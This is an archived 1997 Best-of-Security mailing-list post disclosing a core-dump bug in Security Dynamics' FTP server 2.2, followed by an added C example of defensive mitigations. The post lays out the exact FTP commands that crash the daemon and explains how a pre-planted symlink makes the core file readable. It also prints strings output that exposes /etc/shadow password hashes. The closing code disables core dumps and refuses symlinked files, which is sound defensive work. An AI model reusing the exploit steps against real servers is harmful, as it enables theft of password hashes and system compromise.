Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: best-of-security@cyber.com.au
Subject: BoS: Bug In Security Dynamics' FTP server (Version 2.2)

Hi,

This bug is similar to the Solaris and other ftp core dump bugs, slightly different though. BTW the machine is a SPARC 20 running 2.5. You can link files and clobber them with a core to annoy your local sys admin or, even better, get /etc/shadow, u get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r----- 1 root network 264656 Nov 12 11:14 core

At least it doesn't dump 666 like Solaris's in.ftpd :) But I can't read it :(

Not too useful, you say? Welp, prior to dumping the core you should link it to ps_data or something like that, then you will get this:

lrwxrwxrwx 1 joeuser network 7 Nov 12 11:07 core -> ps_data
-rw-rw-r-- 1 root sys 264656 Nov 12 11:07 ps_data
$file ps_data
ps_data: ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'
$strings core | more
noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root

[ Junk cut --Fyodor ]
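The daemon-side mitigations for the problem reported above, as an added example that is not part of the original message or the vendor's code: disable core files before any secret is read, and create any diagnostic file so that a pre-planted symlink is refused. The function names and the temp-directory paths are constructed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Forbid core files for this process. A daemon that has read
 * /etc/shadow should call this before touching any secret. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    if (setrlimit(RLIMIT_CORE, &rl) != 0 || getrlimit(RLIMIT_CORE, &rl) != 0)
        return -1;
    return (rl.rlim_cur == 0 && rl.rlim_max == 0) ? 0 : -1;
}

/* Create a diagnostic file without following a pre-planted link:
 * O_CREAT|O_EXCL fails with EEXIST if the name exists, symlink or not;
 * O_NOFOLLOW is a second guard; mode 0600 keeps the file owner-only. */
int open_dump_file(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Constructed scenario: "core" is a symlink to "ps_data" inside a private
 * temp directory. Returns 1 if the open is refused and ps_data is never
 * created, 0 if the link was followed, -1 on setup failure. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/coredemoXXXXXX", target[64], lnk[64];
    struct stat st;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/ps_data", dir);
    snprintf(lnk, sizeof lnk, "%s/core", dir);
    if (symlink("ps_data", lnk) != 0) { rmdir(dir); return -1; }
    int fd = open_dump_file(lnk);
    int refused = (fd < 0 && errno == EEXIST);
    int untouched = (lstat(target, &st) != 0);   /* link target never created */
    if (fd >= 0)
        close(fd);
    unlink(lnk); unlink(target); rmdir(dir);
    return refused && untouched;
}
```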